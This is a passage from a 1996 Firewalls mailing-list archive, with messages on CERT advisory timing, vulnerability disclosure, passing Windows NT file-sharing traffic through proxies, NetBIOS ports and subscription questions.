06:00:36 -0700 (PDT) Received: from pathfinder.com (relay.pathfinder.com [204.71.242.18]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA13643 for ; Tue, 16 Jul 1996 06:00:22 -0700 (PDT) Received: from harpoon.excalibur-group.com by pathfinder.com (8.6.12/SMI-SVR4) Message-Id: <2.2.32.19960716125704.007383e4@mail.pathfinder.com> X-Sender: josh@mail.pathfinder.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 16 Jul 1996 08:57:04 -0400 To: cmcurtin@megasoft.com, firewalls From: Josh Hartmann Subject: Re: CERT Advisories (was: Re: Dirty dogs) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk CERT has sent out a warning about ill-behaved cgi applications distributed with early NCSA and Apache servers. It was this past winter or spring, I believe. This is not rocket science, folks. If you run a web server, you need to understand the applications which can be executed by remote, untrusted users. These live within the CGI directories. *ALWAYS* inspect the source code of these applications, and if you do not understand it, do not allow it to be executed. 'Nuff said. -Josh At 08:05 AM 7/16/96 -0400, C Matthew Curtin wrote: >>>>>> "ryan" == SYBASE writes: > >ryan> I have yet to see a CERT advisory on these... Don't they >ryan> usually warn about attacks that are being actively pursued? > >Yes, but only on attacks that are known to have a fix. Presumably, >getting rid of /cgi-bin/phf would do the trick, hence, CERT would be >able to send out an advisory. Has 8LGM sent one out? I haven't seen >anything. > >Maybe it's time for a "firewalls advisory" :-) > >-- >C Matthew Curtin MEGASOFT, LLC Director, Security Architecture >cmcurtin@research.megasoft.com http://www.research.megasoft.com/~cmcurtin/ >Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet > > =================================================================== Josh Hartmann josh@pathfinder.com The Excalibur Group 100 First Stamford Place (203) 406-2908 Stamford, CT 06902 fax (203) 406-2921 A joint venture between Time Inc. New Media and Time Warner Cable =================================================================== From firewalls-owner Tue Jul 16 06:33:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15141 for firewalls-outgoing; Tue, 16 Jul 1996 06:29:15 -0700 (PDT) Received: from gw.genre.com (genre.com [204.149.79.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA15132 for ; Tue, 16 Jul 1996 06:29:08 -0700 (PDT) Received: by gw.genre.com id AA09437 Received: by gw.genre.com (Internal Mail Agent-2); Message-Id: <9607161325.AA7376@grcstm-nx02.genre.com> Received: by gw.genre.com (Internal Mail Agent-1); To: firewalls From: ygerman Date: 16 Jul 96 9:22:51 Subject: CERT Advisories (was: Re: Dirty dogs) Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ryan> I have yet to see a CERT advisory on these... Don't they ryan> usually warn about attacks that are being actively pursued? CERT only sends out advisories once the manufacturer or the developer puts out a fix for the problem. So if you see a CERT advisory it means that the 'crackers' known about the bug for weeks or even months. As always System Admins / Security is always fighting a catch up battle with no way of winning. One way to actually know what is going on is to get on the 'cracker' web sights, bbs's, IRC's and fix the problems before they are released in CERT. From firewalls-owner Tue Jul 16 07:11:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA17439 for firewalls-outgoing; Tue, 16 Jul 1996 06:59:34 -0700 (PDT) Received: from relay2.jaring.my (relay2.jaring.my [192.228.128.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA17422 for ; Tue, 16 Jul 1996 06:59:24 -0700 (PDT) Received: from j14.glg53.jaring.my (j14.glg53.jaring.my [161.142.227.220]) by relay2.jaring.my (8.6.13/8.6.12) with SMTP id VAA19736; Tue, 16 Jul 1996 21:55:54 +0800 Message-Id: <199607161355.VAA19736@relay2.jaring.my> X-Sender: tjlow@pop2.jaring.my X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 16 Jul 1996 21:53:43 +0100 To: cmcurtin@megasoft.com, firewalls From: tjlow@pl.jaring.my (Low Taek Jho) Subject: Need some help. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yo, OK, I'm going on holiday in Aug. And I know that all my mails will fill up my mailbox and go beyond 4 MB which is my limit on my server. I called up the server and they said that they couldn't do anything to increase to space. Any ideas how I could let the mails keep on comming in without my server deleting it? thanks./. By, Jho. From firewalls-owner Tue Jul 16 07:55:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA19763 for firewalls-outgoing; Tue, 16 Jul 1996 07:34:10 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA19756 for ; Tue, 16 Jul 1996 07:34:03 -0700 (PDT) Received: (from davem@localhost) by phoenix.iss.net (8.6.13/8.6.12) id KAA21171; Tue, 16 Jul 1996 10:30:50 -0400 Date: Tue, 16 Jul 1996 10:30:48 -0400 (EDT) From: "David J. Meltzer" To: firewalls@GreatCircle.COM Subject: Re: CERT Advisories (was: Re: Dirty dogs) In-Reply-To: <9607161325.AA7376@grcstm-nx02.genre.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > One way to actually know what is going on is to get on the 'cracker' web > sights, bbs's, IRC's > and fix the problems before they are released in CERT. > This is actually quite a waste of time. There are several mailing lists that are commonly used by security professionals to initially report problems (Bugtraq, Best of Security, Linux Security, Freebsd Security, etc.), and it is vital that any security administrator stays current with anything relevant being posted to these. Unpublished information is not available on some top secret web pages, only accessible by typing in "hacker" in altavista. Unpublished information is not available by attempting to infiltrate some secret hacker BBS. Unpublished information is not available by asking for it on IRC. CERT is certainly not a single resource to be relied upon as it is often several months behind the mailing lists and only selectively issues advisories on problems. Still, that is not grounds for sending security conscious admins off on a wild goose chase. If you have been so successful in infiltrating the things you speak of and have found information that has not been available through reading relevant mailing lists, I suppose you have numerous unpublished exploits you are protecting your systems with? Perhaps you could share a few with us? --------------------------------+--------------------- David J. Meltzer | Email: davem@iss.net Systems Engineer | Web: www.iss.net Internet Security Systems, Inc. | Fax: (404)252-2427 From firewalls-owner Tue Jul 16 08:55:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA25582 for firewalls-outgoing; Tue, 16 Jul 1996 08:37:55 -0700 (PDT) Received: from uumx.smtp.psi.net (uumx.smtp.psi.net [38.9.4.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA25566 for ; Tue, 16 Jul 1996 08:37:47 -0700 (PDT) Received: from uu5.psi.com by uumx.smtp.psi.net (8.6.12/SMI-4.1.3-PSI) Received: from cdcc.com by uu5.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; Received: from cdcc.cdcc.com by cdcc.com (4.1/SMI-4.1) Date: Tue, 16 Jul 96 10:36:30 EDT From: markj@cdcc.com (Mark Januszka) Message-Id: <9607161436.AA20402@cdcc.com> To: cmcurtin@megasoft.com, firewalls@GreatCircle.COM Subject: Re: Need some help. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From uupsi5!GreatCircle.COM!firewalls-owner Tue Jul 16 10:23:56 1996 > X-Sender: tjlow@pop2.jaring.my > X-Mailer: Windows Eudora Version 1.4.3 > Mime-Version: 1.0 > Content-Type> : > text/plain> ; > charset="us-ascii"> > Date: Tue, 16 Jul 1996 21:53:43 +0100 > To: cmcurtin@megasoft.com, firewalls > From: uupsi5!pl.jaring.my!tjlow (Low Taek Jho) > Subject: Need some help. > Sender: uupsi5!GreatCircle.COM!firewalls-owner > Content-Length: 347 > > Yo, > OK, I'm going on holiday in Aug. And I know that all my mails will fill > up my mailbox and go beyond 4 MB which is my limit on my server. I called > up the server and they said that they couldn't do anything to increase to > space. Any ideas how I could let the mails keep on comming in without my > server deleting it? thanks./. > > By, > Jho. > > You can redirect your mail into a script (via aliases) that could screen and / or save it in your home directory. L8r, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Mark W. Januszka Senior Systems Administrator - CDC Capital Inc Phone: 212-891-6296 Email: markj@cdcc.com ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ From firewalls-owner Tue Jul 16 09:22:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA26621 for firewalls-outgoing; Tue, 16 Jul 1996 09:06:02 -0700 (PDT) Received: from earth.usa.net (earth.usa.net [192.156.196.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA26614 for ; Tue, 16 Jul 1996 09:05:53 -0700 (PDT) Received: (from mec@localhost) by earth.usa.net (8.7.5/8.7.5) id KAA26290; Tue, 16 Jul 1996 10:02:36 -0600 (MDT) Date: Tue, 16 Jul 1996 10:02:34 -0600 (MDT) From: "Matthew Cable/USA.NET Inc." X-Sender: mec@earth To: "David J. Meltzer" cc: firewalls@GreatCircle.COM Subject: Re: CERT Advisories (was: Re: Dirty dogs) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 16 Jul 1996, David J. Meltzer wrote: > > One way to actually know what is going on is to get on the 'cracker' web > > sights, bbs's, IRC's > > and fix the problems before they are released in CERT. > > > > This is actually quite a waste of time. There are several mailing lists that > are commonly used by security professionals to initially report problems > (Bugtraq, Best of Security, Linux Security, Freebsd Security, etc.), and it > is vital that any security administrator stays current with anything relevant > being posted to these. Unpublished information is not available on some > top secret web pages, only accessible by typing in "hacker" in altavista. > Unpublished information is not available by attempting to infiltrate some > secret hacker BBS. Unpublished information is not available by asking for > it on IRC. you are one bad-ass m0f0 ;) #!/usr/bin/perl -- Matthew Cable -- USA.NET -- Senior System Administrator $fof='8a*)v2*^Gf#*5S="!jh!;F)]#T):)#&f5kR^(%!E#;0>#:|#8)#;P#80#:o#;)#; From firewalls-owner Tue Jul 16 09:54:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA28375 for firewalls-outgoing; Tue, 16 Jul 1996 09:44:12 -0700 (PDT) Received: from dfw-ix9.ix.netcom.com (dfw-ix9.ix.netcom.com [206.214.98.9]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA28368 for ; Tue, 16 Jul 1996 09:44:06 -0700 (PDT) Received: from ftp2 (ftp2.retailpro.com [204.86.245.12]) by dfw-ix9.ix.netcom.com (8.6.13/8.6.12) with SMTP id JAA26347 for ; Tue, 16 Jul 1996 09:41:02 -0700 Message-ID: <31EBC545.4E3C@ix.netcom.com> Date: Tue, 16 Jul 1996 09:37:25 -0700 From: "Karl W. Palachuk" Reply-To: karlp@ix.netcom.com Organization: Firebrand X-Mailer: Mozilla 3.0b5a (WinNT; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: Ports 137 & 138 References: <199607152241.AAA07356@rbit.co.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Do some NT websites use port 137 to resolve names? My proxy > logs indicates that some hits on port 137 are in groups > of 3, some from websites. My perusal of denied 137 hits: > The old (1993) Microsoft Lan Manager and RFC 1060 define ports 137 and 138 as udp (rather than tcp) ports. 137 is defined as nbname (net beui name). 138 is defined as nbdatagram (net beui datagram). Someone might be trying to access these via tcp, but of course that would fail. -- / Karl W. Palachuk Firebrand Corporation \ / 4800 Manzanita Ave. http://www.firebrand.com \ \ Carmichael, CA 95608 mailto:karl@rti.uucp.netcom.com / \ Ph: 916-483-9736 Fax: 916-481-6903 / From firewalls-owner Tue Jul 16 10:09:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA29891 for firewalls-outgoing; Tue, 16 Jul 1996 10:01:41 -0700 (PDT) Received: from uumx.smtp.psi.net (uumx.smtp.psi.net [38.9.4.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA29884 for ; Tue, 16 Jul 1996 10:01:34 -0700 (PDT) Received: from uu5.psi.com by uumx.smtp.psi.net (8.6.12/SMI-4.1.3-PSI) Received: by uu5.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; Received: from shellgate.shell.com by shellus.com SHELLGATE-X1.4 id AA13600; Tue, 16 Jul 96 11:28:43 -0500 Received: from blake by shellgate.shell.com SHELLGATE-I1.3 id AA08886; Tue, 16 Jul 96 10:11:25 -0500 Received: from localhost by blake.ic.shell.com (4.1/BRC-2.0) Message-Id: <9607161145.AA08482@blake.ic.shell.com> To: Firewalls@GreatCircle.COM Cc: ntsecurity@iss.net Subject: Windows NT & Firewalls Date: Tue, 16 Jul 96 06:45:53 -0500 From: "Greg Otto" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for any information possible on how to pass NT File Server traffic through an IP firewall. Primarily, are there any firewalls out there that will pass NT traffic including WINS lookups and data. I have thought about this and with NAT, the only thing I see that can possibly make it work is to put a WINS server out on the DMZ and put in addresses corresponding to how address translation works. Also, how would one go about doing outbound traffic through a proxy type firewall. These are just some ideas I am trying to sort out. Any information or direction on where to find some help would be greatly appreciated. Thanks, Greg Gregory D. Otto - gdo@shellus.com Engineer Voice & Data Networking Shell Services Company From firewalls-owner Tue Jul 16 11:48:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA07400 for firewalls-outgoing; Tue, 16 Jul 1996 11:32:07 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA07364 for ; Tue, 16 Jul 1996 11:31:55 -0700 (PDT) Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0) Message-ID: From: Russ To: "'Firewalls@GreatCircle.COM'" Cc: "'ntsecurity@iss.net'" Subject: RE: Windows NT & Firewalls Date: Tue, 16 Jul 1996 14:26:36 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You could open TCP port 139, and use entries in the client's LMHOSTS file to give direct access to file shares. You're users would have to know what they are trying to connect to, both in terms of the machine name and the share name. You could handle this with permanent ghosted shares in everyone's file manager, or with shortcuts if you're using Win95/NT 4.0. This will rely on NT's event logger to inform you of security issues such as someone continually trying to connect to a share with an invalid user ID or password. If you are trying to get to an NT Service, like Exchange Server, then the issue is a bit more complicated. You will have to leave TCP port 135 open, for the portmapper, then force the service to use specific ports, and then leave those ports open as well. There aren't any NT specific proxies that I am aware of for any of these services, but many of the generic proxies will check for the more common hack attempts. Putting an NT Server in your DMZ for WINS services implies that you either want to permit browsing (something I would strongly discourage), or Domain Trust connectivity. If you simply want to provide Domain Trust connectivity, then you could set up LMHOSTS entries for the opposite servers using the IP address of your opposite firewall beside the NetBIOS name. Then have the firewall proxy traffic from ports 135 and 137 from your known Firewalls only to an internal NT server. What you really want is included in PPTP, and the CIFS initiatives. NT 4.0 implements the integration of DNS with WINS, allowing you to use a DNS name instead of a NetBIOS name to refer to another machine, thereby eliminating the need for the external WINS box. As long as your opposite Firewall can resolve the DNS lookup request, NT would be able to resolve the NetBIOS name properly even with address translation. Connecting NT Domains through a Firewall, however, still relies on the Firewalls ability to proxy the traffic through, either directly to another NT box, or straight onto your network (obviously not recommended). > >Cheers, >Russ >...running MS Exchange Server 4.0 on NT 4.0, the future is here now. From firewalls-owner Tue Jul 16 12:48:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA08001 for firewalls-outgoing; Tue, 16 Jul 1996 11:43:38 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA07994 for ; Tue, 16 Jul 1996 11:43:30 -0700 (PDT) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id NAA25709; Tue, 16 Jul 1996 13:36:52 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA09015 Date: Tue, 16 Jul 1996 13:38:39 -0500 (CDT) From: Ken Hardy Reply-To: Ken Hardy To: Greg Otto Cc: Firewalls@GreatCircle.COM, ntsecurity@iss.net Subject: Re: Windows NT & Firewalls In-Reply-To: <9607161145.AA08482@blake.ic.shell.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 16 Jul 1996, Greg Otto wrote: > Also, how would one go about doing outbound traffic through a proxy > type firewall. I've written about this on the firewalls mailing list before, I think. Basically, you can use a plug-board proxy (plug-gw from fwtk, e.g.), to proxy 139/tcp through the firewall to your destination machine. Unfortunately, given the dumb nature of a generic tcp proxy, you can only connect to one outside system from a given inside system. If that will meet your needs, the challenge is getting the internal client to connect to the proxying firewall when you want to connect to the external system. I accomplished this by putting the firewall's internal IP address on the external system's name in the LMHOSTS file. I.e., make the internal client think that the firewall _is_ the external server. You might be able to play similar games with WINS, though I've not tried it. You need to have the client think it's really connecting to the external server because the SMB connection protocol includes the server's name. NT servers (in my experience) will reject a connection if the name in the connection message does not match its own sense of itself. The Samba Unix client for sharing files with NT (and other MS) clients is not so picky. If it gets a connection request for a share or a service it's offering from an authenticated user, it doesn't care what the host name in the connection request is. When going through a firewall to a Samba server from an NT workstation, I just made the connection to "\\firewall\sharename", e.g., and got a good connection to the Samba server on the outside. Given that the hostname of the server is contained in the connection request, it ought to be possible to write an SMB-specific proxy that would read the hostname in the connection request it's proxying to determine where to make the end connection. It could then be configured to allow or deny any combination of clients and servers. I'm unaware of any such proxy. You'd still have to trick the client to make the connection to the firewall, unless you were using transparent proxy technology as implemented in certain commercial proxying firewalls. WARNING: It appears to me through experiments I've conducted that NT wants the entire connection request in a single packet, entirely contrary to the streaming nature of TCP. When testing with a proxy that reencapsulated the data into smaller IP packets, the NT server read the first packet, recognized it as the beginning of an incomplete connection request, and sent back an error before reading the 2nd packet containing the remainder of the connection request. This must be an error; TCP is a streaming protocol and how the data is delivered between multiple packets should be irrelevant to a correctly written application. Interestingly enough, the Unix Samba package worked properly through this same proxy. It's easy to visualize a programming error that causes the improper behavour I've seen with NT. (No, I don't recall the exact release and serivice pack numbers on the NT system on which I've observed this.) One security advantage of proxies over packet filters is that the proxy re-encapsulates the data into new packets, so no IP options, fragmentations, etc., on the incoming stream's packets appear on the outbound side. As TCP is a streaming protocol without any message boundaries being needed by or available to the applications, it shouldn't matter whether or not the proxy sends the data in the same number of packets of the same size as on its receiving side. Russ Cooper (I think) sent me some configuration suggestions to try on the NT system to see if it could be make to behave properly in this scenario, but I've never had a chance to try them and see if it helps. I'm sure I have his message around here somewhere, but I cannot find it right now. If he sees this, perhaps he'll repeat it to the list. -- KH From firewalls-owner Tue Jul 16 13:03:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA14385 for firewalls-outgoing; Tue, 16 Jul 1996 12:59:42 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA14378 for ; Tue, 16 Jul 1996 12:59:35 -0700 (PDT) Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0) Message-ID: From: Russ To: "'Ken Hardy'" , "'gdo@shellus.com'" Cc: "'Firewalls'" Subject: RE: Windows NT & Firewalls Date: Tue, 16 Jul 1996 15:54:12 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ken said... "Russ Cooper (I think) sent me some configuration suggestions to try on the NT system to see if it could be make to behave properly in this >scenario, but I've never had a chance to try them and see if it helps. I'm >sure I have his message around here somewhere, but I cannot find it right now. If he sees this, perhaps he'll repeat it to the list." >Try changing the following entry in your registry and see if this changes >NT's behaviour with respect to your proxy. I suspect it will. > >Cheers, >Russ > > >HKEY_LOCAL_MACHINE > \SYSTEM > \CurrentControlSet > \Services > \Tcpip > \Parameters > >Value: EnablePMTUBHDetect REG_DWORD >Range: 0 or 1 >Default: 0 (false) > >Setting this parameter to 1 (True) causes TCP to try and detect "Black Hole" >routers while doing Path MTU Discovery. A "Black Hole" router does not return >ICMP Destination Unreachable messages when it needs to fragment a TCP packet >with the Don't Fragment bit set. TCP depends on receiving these messages to >perform Path MTU Discovery. With this feature enabled, TCP will try to send >segments without the Don't Fragment bit set if several retransmissions of a >segment go unacknowledged. If the segment is acknowledged as a result, the >MSS will be decreased and the Don't Fragment bit will be set in future >packets on the connection. Enabling black hole detection increases the >maximum number of retransmissions performed for a given segment. > >Cheers, >Russ >...running MS Exchange Server 4.0 on NT 4.0, the future is here now. > From firewalls-owner Tue Jul 16 14:23:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA17751 for firewalls-outgoing; Tue, 16 Jul 1996 14:06:43 -0700 (PDT) Received: from gw.genre.com (genre.com [204.149.79.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA17734 for ; Tue, 16 Jul 1996 14:06:24 -0700 (PDT) Received: by gw.genre.com id AA12570 Received: by gw.genre.com (Internal Mail Agent-2); Message-Id: <9607162102.AA9122@grcstm-nx02.genre.com> Received: by gw.genre.com (Internal Mail Agent-1); To: "David J. Meltzer" Cc: firewalls From: ygerman Date: 16 Jul 96 16:59:31 Subject: Re: CERT Advisories (was: Re: Dirty dogs) Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > One way to actually know what is going on is to get on the 'cracker' web > sights, bbs's, IRC's > and fix the problems before they are released in CERT. > >CERT is certainly not a single resource to be relied upon as it is often >several months behind the mailing lists and only selectively issues >advisories on problems. Still, that is not grounds for sending security >conscious admins off on a wild goose chase. If you have been so successful >in infiltrating the things you speak of and have found information that >has not been available through reading relevant mailing lists, I suppose you >have numerous unpublished exploits you are protecting your systems with? I have not sent any admins on wild goose chases. It is just that alot of the mailing lists you mentioned also seem to hide the information. I would wish there was a list where the people would be pre-registered like with my firewall vendor list or the way you have a secure mailing list through ISS. So that there are only Sysadmins/security people on the list and free sharing of security holes could be accomplished without worrying about a cracker sitting on the list getting information. As for numerous unpublished exploits part... I do not have any more then anyone else does but I was able to find out and close one or two of the past security holes prior to a CERT announcement or being mentioned on the lists. The point I was trying to make is that WE ARE PL AYING CATCH-UP due to a lack of timely information. From firewalls-owner Tue Jul 16 15:25:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19951 for firewalls-outgoing; Tue, 16 Jul 1996 14:47:37 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id OAA19930 for firewalls@greatcircle.com; Tue, 16 Jul 1996 14:47:16 -0700 (PDT) Received: from nacg.trane.com (nacg.trane.com [198.80.4.199]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA08818 for ; Tue, 16 Jul 1996 11:56:53 -0700 (PDT) Received: by nacg.trane.com id AA09232 Message-Id: <199607161853.AA09232@nacg.trane.com> Received: by nacg.trane.com (Internal Mail Agent-1); From: "Norton, Dave" To: Firewalls-post Subject: 'ntsecurity' list ref Date: Tue, 16 Jul 96 13:54:00 PDT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Howdy, Just lately, someone instructed that sending: subscribe ntsecurity [your mailbox@whatever] to: majordomo@iss.net gets one on the list... Cool... Real normal... But it doesn't work... Could someone tell me what I'm missing here? I get a 'majordomo- owner' results notice of failure, with instructions of how to get more info from majordomo@iss.net. When I do a 'lists' query, sure enough there's "ntsecurity"... Then with I do an 'info ntsecurity' query, I get "no data available for ntsecurity"... I don't get it. Can someone shed some light here for me? Thanx... dnorton@trane.com From firewalls-owner Tue Jul 16 15:27:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19799 for firewalls-outgoing; Tue, 16 Jul 1996 14:45:36 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id OAA19770 for firewalls@greatcircle.com; Tue, 16 Jul 1996 14:45:22 -0700 (PDT) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA06370 for ; Tue, 16 Jul 1996 03:38:09 -0700 (PDT) Received: from tidtest.total.fr (tidtest.total.fr [146.249.165.73]) by pegase.total.fr (8.6.8/8.6.6) with SMTP id MAA29669; Tue, 16 Jul 1996 12:34:56 +0200 Received: by tidtest.total.fr (4.1/SMI-4.1) Message-Id: <9607161033.AA19480@tidtest.total.fr> To: alexf@iss.net Cc: firewalls@greatcircle.com Subject: Re: NT Backoffice "Catapult" firewall certified? In-Reply-To: Your message of "Thu, 11 Jul 1996 10:57:05 -0000." Date: Tue, 16 Jul 1996 12:33:31 +0100 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <199607111455.KAA24217@phoenix.iss.net>, "Alex F" writes: > > Please pay attention to the above line and do not attempt to > subscribe the address my@email.address > > Yes, several people did this by mistake :) (oops) > The funniest similar problem I heard of was ~ 6 months ago, when someone subscribed a whole mailing list to itself, eg : "subscribe firewalls firewalls@greatcircle.com" *DON'T TRY THIS AT HOME* :-) Back to the regularly scheduled subscribe requests Michel Lavondes (lavondes@tidtest.total.fr) #include Governments are guilty until proved innocent From firewalls-owner Tue Jul 16 15:40:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA21857 for firewalls-outgoing; Tue, 16 Jul 1996 15:19:52 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA21837 for ; Tue, 16 Jul 1996 15:19:41 -0700 (PDT) Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0) Message-ID: From: Russ To: "'David J. Meltzer'" , "'ygerman'" Cc: "'firewalls'" Subject: RE: CERT Advisories (was: Re: Dirty dogs) Date: Tue, 16 Jul 1996 18:14:17 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ygerman said... > "I have not sent any admins on wild goose chases. It is just that alot of >the mailing lists you mentioned also seem to hide the information. I would >wish there was a list where the people would be pre-registered like with my >firewall vendor list or the way you have a secure mailing list through ISS. >So that there are only Sysadmins/security people on the list and free sharing >of security holes could be accomplished without worrying about a cracker sitting on the list getting information." Russ says... You're not seriously suggesting that many Black Hats don't work in the security industry, are you? Are we back to the thread on polygraphs again? Just because someone has a registered email address, or works for a reputable company, or has purchased a Firewall product, does not translate to someone you can trust with your inner-most secrets!!! This sounds like the thread about the Satan application form! There is no way you will have a secure mailing list, ever!, not in the sense that you imagine. The only issue is whether or not CERT (or some other list) posts information about hacks (or attempts) before, or after, a fix has been made by the vendor(s) in question. Someone from CERT previously spoke up about this in a thread at the beginning of the year (check the archives). If I can try to summarize, their opinion was simply that it didn't make a whole lot of sense to tell the world (since its impossible to have a secure mailing list), that a hole exists in a piece of code prior to the vendor figuring out how to plug it. Sure, by doing so they put the pressure on the vendor to make a fix quickly, but at the same time they also expose the possible exploit to people whom might otherwise not have figured it out yet, thereby leading to more exploits of the hole. Besides, putting pressure on the vendors neither guarantees a quick fix, nor a reliable one. Cheers, Russ ...running MS Exchange Server 4.0 on NT 4.0, the future is here now. > From firewalls-owner Tue Jul 16 15:49:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19805 for firewalls-outgoing; Tue, 16 Jul 1996 14:45:44 -0700 (PDT) Received: from mail.airmail.net (server-f.iadfw.net [206.66.12.40]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA19751 for ; Tue, 16 Jul 1996 14:45:12 -0700 (PDT) Received: by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.73) Message-Id: <2.2.32.19960716214032.006f409c@raptor1> X-Sender: dlancaster@raptor1 X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Tue, 16 Jul 1996 16:40:32 -0500 To: Bill Stout From: Dale Lancaster Subject: Re: Sidewinder Versus EagleRaptor Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Bill, Good job on the comparison. Though as stated, you need to compare apples to apples. TIS on Unix and Eagle on NT are different animals. Some of the things missing on the Eagle NT are because there is no NT support from the vendors for that missing piece. An example is Secure ID authentication, or running a sendmail server on NT (which I find to be very questionable). I'll make a few changes below to complete the picture and probably need your feedback on TIS since I don't keep up to speed on every 